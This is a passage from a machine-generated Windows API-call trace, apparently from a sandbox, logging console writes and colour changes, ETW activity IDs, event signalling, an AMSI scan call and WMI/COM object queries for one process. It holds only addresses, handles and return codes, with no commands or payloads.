nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0176.888] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0176.900] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0176.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0176.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0176.987] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0176.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0177.015] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0177.034] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0177.037] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a3f64*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a3f64*, lpNumberOfCharsWritten=0x86de4f4*=0x40) returned 1 [0177.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0177.219] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0177.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0177.515] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0177.611] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0177.702] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0177.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0177.905] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0177.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0178.140] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0178.233] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0178.327] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0178.516] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0178.577] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0178.671] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a3ff4*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a3ff4*, lpNumberOfCharsWritten=0x86de4f4*=0x20) returned 1 [0178.805] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0178.889] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0178.984] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0179.077] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0179.287] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0179.639] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0179.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0179.827] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0179.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0180.046] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0180.390] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0180.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0180.796] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0180.926] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0181.014] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a4044*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a4044*, lpNumberOfCharsWritten=0x86de4f4*=0x58) returned 1 [0181.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0181.243] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0181.327] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0181.421] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0181.873] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0182.283] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0182.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0182.685] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0182.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0182.902] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0183.084] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0183.181] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0183.295] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0183.342] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0183.435] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a4104*, nNumberOfCharsToWrite=0x69, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a4104*, lpNumberOfCharsWritten=0x86de4f4*=0x69) returned 1 [0183.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0183.733] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0183.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0183.953] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0184.072] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0184.154] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0184.249] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0184.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0184.623] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0184.717] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0184.810] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0184.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0185.014] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0185.107] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0185.201] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a41e4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a41e4*, lpNumberOfCharsWritten=0x86de4f4*=0x1) returned 1 [0185.342] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0185.435] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0185.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0185.827] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0185.921] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0186.015] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0186.109] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86decdc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86decdc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.109] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86decdc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86decdc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ded3c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df048*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df048*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x57, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86decd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86decd0*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2e, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.110] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ded30*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ded30*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.112] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.112] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86deec8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86deec8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.113] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df048*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df048*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x73, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.113] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.120] SetEvent (hEvent=0x6e0) returned 1 [0186.120] SetEvent (hEvent=0x6d4) returned 1 [0186.120] SetEvent (hEvent=0x6d8) returned 1 [0186.120] SetEvent (hEvent=0x6dc) returned 1 [0186.120] SetEvent (hEvent=0x6f0) returned 1 [0186.120] SetEvent (hEvent=0x6e4) returned 1 [0186.120] SetEvent (hEvent=0x6e8) returned 1 [0186.120] SetEvent (hEvent=0x6ec) returned 1 [0186.120] SetEvent (hEvent=0x6f4) returned 1 [0186.130] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86df1dc*=0x6fc, lpdwindex=0x86deffc | out: lpdwindex=0x86deffc) returned 0x0 [0186.130] SetThreadUILanguage (LangId=0x0) returned 0xf00409 [0186.238] CoCreateGuid (in: pguid=0x86df048 | out: pguid=0x86df048*(Data1=0xa413b193, Data2=0x7dde, Data3=0x4396, Data4=([0]=0xb6, [1]=0x5, [2]=0xe8, [3]=0x8c, [4]=0x50, [5]=0xea, [6]=0x5e, [7]=0x80))) returned 0x0 [0186.238] QueryPerformanceCounter (in: lpPerformanceCount=0x86df028 | out: lpPerformanceCount=0x86df028*=28199373806) returned 1 [0186.238] AmsiOpenSession () returned 0x0 [0186.238] AmsiScanString () returned 0x80070015 [0186.244] QueryPerformanceCounter (in: lpPerformanceCount=0x86deff0 | out: lpPerformanceCount=0x86deff0*=28200022973) returned 1 [0186.245] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86df0b8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df0b8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xdd, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.245] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df024*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df024*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x2f, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.245] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xdd, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86df0a8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xdd, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.247] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x86deba0*=0x878, lpdwindex=0x86dea5c | out: lpdwindex=0x86dea5c) returned 0x0 [0186.255] SetEvent (hEvent=0x87c) returned 1 [0186.255] SetEvent (hEvent=0x878) returned 1 [0186.255] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86df048*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86df048*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xdd, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0186.255] SetEvent (hEvent=0x870) returned 1 [0186.255] SetEvent (hEvent=0x87c) returned 1 [0186.255] SetEvent (hEvent=0x878) returned 1 [0186.255] SetEvent (hEvent=0x860) returned 1 [0186.255] SetEvent (hEvent=0x86c) returned 1 [0186.255] SetEvent (hEvent=0x868) returned 1 [0186.255] SetEvent (hEvent=0x864) returned 1 [0186.255] SetEvent (hEvent=0x85c) returned 1 [0186.268] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x86df1dc*=0x6fc, lpdwindex=0x86deffc | out: lpdwindex=0x86deffc) returned 0x0 [0187.321] CoGetContextToken (in: pToken=0x86df5d0 | out: pToken=0x86df5d0) returned 0x0 [0187.321] CoGetContextToken (in: pToken=0x86defc8 | out: pToken=0x86defc8) returned 0x0 [0187.321] CoGetContextToken (in: pToken=0x86def48 | out: pToken=0x86def48) returned 0x0 [0187.322] IUnknown:Release (This=0x75ee208) returned 0x1 [0187.322] IUnknown:Release (This=0x75ee208) returned 0x0 [0187.408] CoGetContextToken (in: pToken=0x86def48 | out: pToken=0x86def48) returned 0x0 [0187.408] WbemStatusCodeText:IUnknown:Release (This=0x7aeb780) returned 0x1 [0187.408] WbemStatusCodeText:IUnknown:Release (This=0x7aeb780) returned 0x0 [0187.408] IUnknown:Release (This=0x12fa028) returned 0x0 [0187.408] CoUninitialize () Thread: id = 222 os_tid = 0x1120 Thread: id = 229 os_tid = 0x1004 [0159.333] CoGetContextToken (in: pToken=0x886fc94 | out: pToken=0x886fc94) returned 0x0 [0159.333] CObjectContext::QueryInterface () returned 0x0 [0159.333] CObjectContext::GetCurrentThreadType () returned 0x0 [0159.333] Release () returned 0x0 [0159.333] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0159.333] RoInitialize () returned 0x1 [0159.333] RoUninitialize () returned 0x0 [0159.334] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0159.334] SleepEx (dwMilliseconds=0x2710, bAlertable=1) returned 0x0 [0169.361] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) Thread: id = 230 os_tid = 0xe78 Thread: id = 231 os_tid = 0x1194 Thread: id = 235 os_tid = 0x1110 [0163.588] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0163.588] RoInitialize () returned 0x1 [0163.588] RoUninitialize () returned 0x0 [0163.670] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x8acec7c | out: lpiid=0x8acec7c) returned 0x0 [0163.672] CoGetClassObject (in: rclsid=0x76d5e3c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x73b5b24c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8ace988 | out: ppv=0x8ace988*=0x7aeb600) returned 0x0 [0163.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73ba9e44*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8aceba4 | out: ppvObject=0x8aceba4*=0x0) returned 0x80004002 [0163.694] WbemDefPath:IClassFactory:CreateInstance (in: This=0x7aeb600, pUnkOuter=0x0, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8acebb0 | out: ppvObject=0x8acebb0*=0x7a9ebd8) returned 0x0 [0163.695] WbemDefPath:IUnknown:Release (This=0x7aeb600) returned 0x0 [0163.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8ace7d4 | out: ppvObject=0x8ace7d4*=0x7a9ebd8) returned 0x0 [0163.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b50328*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8ace790 | out: ppvObject=0x8ace790*=0x0) returned 0x80004002 [0163.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b50490*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x8ace384 | out: ppvObject=0x8ace384*=0x0) returned 0x80004002 [0163.695] WbemDefPath:IUnknown:AddRef (This=0x7a9ebd8) returned 0x3 [0163.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b50074*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8ace0e4 | out: ppvObject=0x8ace0e4*=0x0) returned 0x80004002 [0163.695] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b4ffc8*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8ace094 | out: ppvObject=0x8ace094*=0x0) returned 0x80004002 [0163.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73a97604*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8ace0a0 | out: ppvObject=0x8ace0a0*=0x133cdc0) returned 0x0 [0163.696] WbemDefPath:IMarshal:GetUnmarshalClass 